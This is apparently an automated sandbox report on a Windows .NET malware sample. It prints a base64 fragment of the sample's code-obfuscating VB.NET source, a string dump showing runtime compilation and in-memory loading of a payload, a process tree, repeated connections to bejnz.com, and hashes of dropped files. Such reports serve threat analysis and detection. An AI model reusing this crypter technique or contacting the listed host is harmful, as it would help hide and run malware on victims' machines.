ZXdMaW5lICsgIiAgICBQdWJsaWMgRnVuY3Rpb24gdmFyMSIgJiBuYW1lICYgIihCeVZhbCB2YXIyIEFzIFN0cmluZywgQnlWYWwgdmFyMyBBcyBTdHJpbmcsIEJ5VmFsIHZhcjQgQXMgU3RyaW5nKSBBcyBTdHJpbmciKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICBEaW0gdmFyNSBBcyBTdHJpbmcoKSA9IHsiInZhcjEiIiwgIiJ2YXIyIiIsICIidmFyMyIiLCAiInZhcjQiIiwgIiJ2YXI1IiJ9IikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgRm9yIEVhY2ggdmFyNiBBcyBTdHJpbmcgSW4gdmFyNSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBEbyBVbnRpbCB2YXI1KDApID0gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgdmFyMyA9IHZhcjQgJiB2YXIyIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBJZiB2YXI0LkNvbnRhaW5zKHZhcjUoMikpID0gVHJ1ZSBUaGVuIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgdmFyNiA9IHZhcjQuTGVuZ3RoIC0gMSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgIFdoaWxlIHZhcjMuTGVuZ3RoID0gMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBEbyBXaGlsZSB2YXIyLkNvbnRhaW5zKHZhcjUoMSkpIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZXR1cm4gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXhpdCBGdW5jdGlvbiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBMb29wIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgRW5kIFdoaWxlIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBFbmQgSWYiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICAgICAgTG9vcCIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBSZXR1cm4gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgIE5leHQiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgIEVuZCBGdW5jdGlvbiIpDQogICAgICAgIERpbSBzcmMgQXMgU3RyaW5nID0gRnVuay5Ub1N0cmluZw0KICAgICAgICBEaW0gdmFycygpIEFzIFN0cmluZyA9IHsidmFyMSIsICJ2YXIyIiwgInZhcjMiLCAidmFyNCIsICJ2YXI1IiwgInZhcjYifQ0KICAgICAgICBSYW5kb21pemUoKQ0KICAgICAgICBGb3IgaSBBcyBJbnRlZ2VyID0gMCBUbyB2YXJzLkxlbmd0aCAtIDENCiAgICAgICAgICAgIHNyYyA9IHNyYy5SZXBsYWNlKHZhcnMoaSksIEEoNSkgJiBuYW1lKQ0KICAgICAgICBOZXh0DQogICAgICAgIFJhbmRvbWl6ZSgpDQogICAgICAgIFJldHVybiBzcmMNCiAgICBFbmQgRnVuY3Rpb24NCg0KDQogICAgUHVibGljIEZ1bmN0aW9uIEEoQnlWYWwgbGVuZ2h0IEFzIEludGVnZXIpIEFzIFN0cmluZw0KICAgICAgICBSYW5kb21pemUoKSA6IERpbSBiKCkgQXMgQ2hhciA6IERpbSBzIEFzIE5ldyBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKCIiKSA6IGIgPSAiUVdFUlRZVUlPUEFTREZHSEpLTFpYQ1ZCTk1xd2VydHl1aW9wYXNkZmdoamtsenhjdmJubSIuVG9DaGFyQXJyYXkoKSA6IEZvciBpIEFzIEludGVnZXIgPSAxIFRvIGxlbmdodCA6IFJhbmRvbWl6ZSgpIDogRGltIHogQXMgSW50ZWdlciA9IEludCgoKGIuTGVuZ3RoIC0gMikgLSAwICsgMSkgKiBSbmQoKSkgKyAxIDogcy5BcHBlbmQoYih6KSkgOiBOZXh0IDogUmV0dXJuIHMuVG9TdHJpbmcNCiAgICBFbmQgRnVuY3Rpb24NCiAgICBQdWJsaWMgRnVuY3Rpb24gQUIoQnlWYWwgbGVuZ2h0IEFzIEludGVnZXIpIEFzIFN0cmluZw0KICAgICAgICBSYW5kb21pemUoKSA6IERpbSBiKCkgQXMgQ2hhciA6IERpbSBzIEFzIE5ldyBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKCIiKSA6IGIgPSAiMTIzNDU2Nzg5MCIuVG9DaGFyQXJyYXkoKSA6IEZvciBpIEFzIEludGVnZXIgPSAxIFRvIGxlbmdodCA6IFJhbmRvbWl6ZSgpIDogRGltIHogQXMgSW50ZWdlciA9IEludCgoKGIuTGVuZ3RoIC0gMikgLSAwICsgMSkgKiBSbmQoKSkgKyAxIDogcy5BcHBlbmQoYih6KSkgOiBOZXh0IDogUmV0dXJuIHMuVG9TdHJpbmcNCiAgICBFbmQgRnVuY3Rpb24NCg0KDQpFbmQgQ2xhc3MNCg0KDQo=BSJB
v2.0.50727
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
DBwhSFVyqT
NSsOCpKoXN
bdprclHsAJ
XdIqXAhnnv
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
UgRwe00
RDNWX0
lKoPp0
xgIhD0
jsHKb11
TByXm1
cczna1
jbHhg1
Deflate_D
System.IO
Stream
getStreamBytesX
dataStr
dataChunks
SWkUJ00
nnssF0
CoAtP0
inSmv0
RNqpI11
fKiGX1
fcaJD1
DSHWz1
uEqLHqkUwH
dVLIw00
KOVuH0
HEgJd0
nFxDb0
zhEYZ11
gjmAY1
ibJaT1
bfZee1
lenght
ToBase
FromBase
inagGgmzDP
Output
Source
Koliko
Kolikox
EfufLttzbW
lKuMPjzGjx
PZgEgwRNBm
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
String
Concat
Contains
get_Length
Conversions
Operators
CompareString
System.Resources
ResourceManager
Delete
ProjectData
Exception
SetProjectError
ClearProjectError
System.Reflection
Assembly
GetExecutingAssembly
GetObject
MethodInfo
get_EntryPoint
MethodBase
Invoke
MemoryStream
System.IO.Compression
DeflateStream
CompressionMode
CopyArray
STAThreadAttribute
DateTime
Random
ProcessStartInfo
ResourceWriter
Process
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
AddResource
Generate
IDisposable
Dispose
GetTempFileName
Replace
VBMath
Randomize
Strings
StrReverse
SetCreationTime
SetLastAccessTime
SetLastWriteTime
ProcessWindowStyle
set_WindowStyle
set_FileName
set_Arguments
System.Text
StringBuilder
ToCharArray
Conversion
Append
Encoding
get_Default
GetBytes
Convert
ToBase64String
FromBase64String
GetString
ICodeCompiler
CompilerResults
CompilerParameters
VBCodeProvider
CreateCompiler
set_GenerateExecutable
set_OutputAssembly
System.Collections.Specialized
StringCollection
get_ReferencedAssemblies
get_EmbeddedResources
set_CompilerOptions
CompileAssemblyFromSource
CreateProjectError
zCom.resources
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
tmp73F7.tmp
tmp73F7.tmp.exe
MyTemplate
8.0.0.0
My.Computer
My.User
My.Application
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
UgRwe0
RDNWX0
lKoPp0
xgIhD0
cIFPX0
jsHKb1
TByXm1
cczna1
jbHhg1
YxbhG1
SWkUJ0
nnssF0
CoAtP0
inSmv0
jPUrF0
RNqpI1
fKiGX1
fcaJD1
DSHWz1
WyUkO1
zCom.resources
NSsOCpKoXN
bdprclHsAJ
DBwhSFVyqT
XdIqXAhnnv
EfufLttzbW
lKuMPjzGjx
PZgEgwRNBm
inagGgmzDP
uEqLHqkUwH
dVLIw0
KOVuH0
HEgJd0
nFxDb0
EwJFI0
zhEYZ1
gjmAY1
ibJaT1
bfZee1
wuKAK1
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM
1234567890
System.dll
System.Data.dll
/filealign:0x00000200 /optimize+ /platform:X86 /debug- /target:winexe
Public Sub var1
(ByVal var2 As String, ByVal var3 As String, ByVal var4 As String)
Dim var5 As String() = {"var1", "var2", "var3", "var4", "var5"}
For Each var6 As String In var5
Do Until var5(0) = var2
var3 = var4 & var2
If var4.Contains(var5(2)) = True Then
var6 = var4.Length - 1
While var3.Length = 2
Do While var2.Contains(var5(1))
Exit Sub
Loop
End While
End If
Loop
Next
End Sub
Public Function var1
(ByVal var2 As String, ByVal var3 As String, ByVal var4 As String) As String
Return var2
Exit Function
Return var2
End Function
QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
tmp73F7.tmp.exe
LegalCopyright
OriginalFilename
tmp73F7.tmp.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0

Process Tree

  • 0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe (2336) "C:\Users\Administrator\AppData\Local\Temp\0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe"
    • tmpBBED.tmp.exe (1600) "C:\Users\Administrator\AppData\Local\Temp\tmpBBED.tmp.exe" C:\Users\Administrator\AppData\Local\Temp\0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe
    • vbc.exe (2060) "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Administrator\AppData\Local\Temp\0pg4tybc.cmdline"
      • cvtres.exe (2004) C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBF49.tmp" "C:\Users\ADMINI~1\AppData\Local\Temp\vbcBF39.tmp"

0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe, PID: 2336, Parent PID: 3028

default registry file network process services synchronisation iexplore office pdf

vbc.exe, PID: 2060, Parent PID: 2336

default registry file network process services synchronisation iexplore office pdf

cvtres.exe, PID: 2004, Parent PID: 2060

default registry file network process services synchronisation iexplore office pdf

tmpBBED.tmp.exe, PID: 1600, Parent PID: 2336

default registry file network process services synchronisation iexplore office pdf

TCP

Source Source Port Destination Destination Port
192.168.56.101 49174 44.221.84.105 bejnz.com 80
192.168.56.101 49175 44.221.84.105 bejnz.com 80
192.168.56.101 49176 44.221.84.105 bejnz.com 80
192.168.56.101 49177 44.221.84.105 bejnz.com 80
192.168.56.101 49178 44.221.84.105 bejnz.com 80
192.168.56.101 49179 44.221.84.105 bejnz.com 80
192.168.56.101 49180 44.221.84.105 bejnz.com 80
192.168.56.101 49181 44.221.84.105 bejnz.com 80
192.168.56.101 49182 44.221.84.105 bejnz.com 80
192.168.56.101 49183 44.221.84.105 bejnz.com 80
192.168.56.101 49184 44.221.84.105 bejnz.com 80
192.168.56.101 49185 44.221.84.105 bejnz.com 80
192.168.56.101 49186 44.221.84.105 bejnz.com 80
192.168.56.101 49187 44.221.84.105 bejnz.com 80
192.168.56.101 49188 44.221.84.105 bejnz.com 80
192.168.56.101 49189 44.221.84.105 bejnz.com 80
192.168.56.101 49190 44.221.84.105 bejnz.com 80
192.168.56.101 49191 44.221.84.105 bejnz.com 80
192.168.56.101 49192 44.221.84.105 bejnz.com 80
192.168.56.101 49193 44.221.84.105 bejnz.com 80
192.168.56.101 49194 44.221.84.105 bejnz.com 80
192.168.56.101 49195 44.221.84.105 bejnz.com 80
192.168.56.101 49196 44.221.84.105 bejnz.com 80
192.168.56.101 49197 44.221.84.105 bejnz.com 80
192.168.56.101 49198 44.221.84.105 bejnz.com 80
192.168.56.101 49199 44.221.84.105 bejnz.com 80
192.168.56.101 49200 44.221.84.105 bejnz.com 80
192.168.56.101 49201 44.221.84.105 bejnz.com 80
192.168.56.101 49202 44.221.84.105 bejnz.com 80
192.168.56.101 49203 44.221.84.105 bejnz.com 80
192.168.56.101 49204 44.221.84.105 bejnz.com 80
192.168.56.101 49205 44.221.84.105 bejnz.com 80
192.168.56.101 49206 44.221.84.105 bejnz.com 80
192.168.56.101 49207 44.221.84.105 bejnz.com 80
192.168.56.101 49208 44.221.84.105 bejnz.com 80
192.168.56.101 49209 44.221.84.105 bejnz.com 80
192.168.56.101 49210 44.221.84.105 bejnz.com 80
192.168.56.101 49211 44.221.84.105 bejnz.com 80
192.168.56.101 49212 44.221.84.105 bejnz.com 80
192.168.56.101 49213 44.221.84.105 bejnz.com 80
192.168.56.101 49214 44.221.84.105 bejnz.com 80
192.168.56.101 49215 44.221.84.105 bejnz.com 80
192.168.56.101 49216 44.221.84.105 bejnz.com 80
192.168.56.101 49217 44.221.84.105 bejnz.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 56933 114.114.114.114 53
192.168.56.101 138 192.168.56.255 138
192.168.56.101 57665 224.0.0.252 5355
192.168.56.101 51758 114.114.114.114 53
192.168.56.101 52215 114.114.114.114 53

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Name c67d2f9120f84155_0pg4tybc.out
Filepath C:\Users\Administrator\AppData\Local\Temp\0pg4tybc.out
Size 2.5KB
Processes 2336 (0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe) 2060 (vbc.exe)
Type Unicode text, UTF-8 (with BOM) text, with very long lines (378), with CRLF line terminators
MD5 0b1f043f1e9d44e44376c5f55c45d70a
SHA1 901e1bfd3561e947cc9b0f316171bd8ac83f216c
SHA256 c67d2f9120f84155e0df6c52e4476bf845ec42769d40875e6ca73c889a80e02e
CRC32 C0F66B1C
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name e3b0c44298fc1c14_tmpBBED.tmp.exe
Size 0.0B
Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 56226bd453ea2be0_tmpbbed.tmp.exe
Filepath C:\Users\Administrator\AppData\Local\Temp\tmpBBED.tmp.exe
Size 78.5KB
Processes 2060 (vbc.exe)
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 e1213fc6bbda00e988dd2b2437ceb4df
SHA1 4cc947d9b9bc781d7a3356c46512c77224464f0f
SHA256 56226bd453ea2be08a280ab495f2a9e8d6fe8c71ddb74b901e51f0ceaf34e066
CRC32 05B1A6BD
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 0b44c8584bddf1d0_0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe
Filepath C:\Users\Administrator\AppData\Local\Temp\0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe
Size 78.5KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 c03ac1db0ebbe03a0a5d43cc27e52908
SHA1 52bdec7165bda43d182c51e9c56d9b431e12c9bd
SHA256 0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b
CRC32 FCAECAF9
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 69db906941dec2a7_zCom.resources
Filepath C:\Users\Administrator\AppData\Local\Temp\zCom.resources
Size 62.7KB
Processes 2336 (0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe)
Type data
MD5 6870a276e0bed6dd5394d178156ebad0
SHA1 9b6005e5771bb4afb93a8862b54fe77dc4d203ee
SHA256 69db906941dec2a7f1748ea1d15a058751c77d851ce54ea9e2ebdf1d6c7ed4f4
CRC32 D9F35CF7
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 41dd715fea6fb817_0pg4tybc.cmdline
Filepath C:\Users\Administrator\AppData\Local\Temp\0pg4tybc.cmdline
Size 282.0B
Processes 2336 (0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe)
Type Unicode text, UTF-8 (with BOM) text, with no line terminators
MD5 20713c26672adbe4f1b15a1df22900af
SHA1 2018f9a0f66f664ff8ec778f3503794a12b85438
SHA256 41dd715fea6fb817ca6f3ba450a44133446ae588c80ef736db2dec596ae96b2b
CRC32 CBFDDFEC
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 6212bacf0c979d01_0pg4tybc.0.vb
Filepath C:\Users\Administrator\AppData\Local\Temp\0pg4tybc.0.vb
Size 15.1KB
Processes 2336 (0b44c8584bddf1d00373b21ad43cf8e73564b498215ec1709209d5d71f02d46b.exe)
Type Unicode text, UTF-8 (with BOM) text, with very long lines (311), with CRLF line terminators
MD5 af064df3dc427e1be4d7a5def0230061
SHA1 5a4bc7e12964c28ac902ffd4d2d27206df819262
SHA256 6212bacf0c979d01fb543f7b02c24ae74a338255fb4b54b0da573e93490b65dd
CRC32 584A08EC
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name bae1be5a5adaff2d_vbcBF39.tmp
Filepath C:\Users\Administrator\AppData\Local\Temp\vbcBF39.tmp
Size 660.0B
Processes 2060 (vbc.exe)
Type MSVC .res
MD5 3537d93993ae316542781f55ce3189d7
SHA1 c3de35167d663bfa7cf42c09ca7a62538737f0a2
SHA256 bae1be5a5adaff2d52e02955ff154a3b14a6565f7f8c0684731f279b18ed92e6
CRC32 D8AAC2BE
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 0ea00e1adba9e9ea_RESBF49.tmp
Filepath C:\Users\Administrator\AppData\Local\Temp\RESBF49.tmp
Size 1.2KB
Processes 2004 (cvtres.exe) 2060 (vbc.exe)
Type Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x416, 9 symbols, created Sat Sep 28 11:02:12 2024, 1st section name ".debug$S"
MD5 012b471a18d1a395353b6ab69df2f40f
SHA1 1f26d393cfc45596cc8528b0222b417aa97d8bf3
SHA256 0ea00e1adba9e9ea2fd9666e57ab0ee80e50bcf57e2053ae2e72f336dad72845
CRC32 DA1B7BB1
ssdeep None
Yara None matched
VirusTotal Search for analysis
Sorry! No dropped buffers.